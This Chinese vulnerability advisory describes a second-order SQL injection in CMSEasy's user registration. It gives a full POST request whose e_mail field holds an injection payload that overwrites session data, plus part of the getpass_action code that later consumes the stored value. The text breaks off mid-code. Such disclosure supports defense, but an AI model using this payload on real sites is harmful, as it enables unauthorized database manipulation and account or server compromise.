cmseasy sql二次注入漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: cmseasy 可shell的漏洞 ### 详细说明: 下载最新的cmseasy,发现有一处问题 用户注册处,email没有做任何限制,可以任意填写 我们发送url: POST /cmseasylast/uploads/index.php?case=user&act=register HTTP/1.1 Host: localhost postdata: username=sql1231&password=111111&password2=111111&question=&answer=ccccc&e_mail=',data='openid|s:1:"2";' WHERE client_ip ='127.0.0.1'#&tel=010-10000000&address=1111111111111&verify=xxxxx&submit=+%E6%B3%A8%E5%86%8C+ 此处由于是本地测试client_ip 可控制 e_mail: ',data='openid|s:1:"2";' WHERE client_ip ='127.0.0.1'# 这里存到了数据库,如图所示: [<img src="https://images.seebug.org/upload/201501/281204438a8d85a724d37fb099635fadb04ec022.png" alt="60.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/281204438a8d85a724d37fb099635fadb04ec022.png) 这里的email字段长度为50 故而我们这样写 然后我们在看看这一处 ``` function getpass_action() { if(front::post('step') == '') { echo template('user/getpass.html'); }else if(front::post('step') == '1') { /* if(!session::get('verify')...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息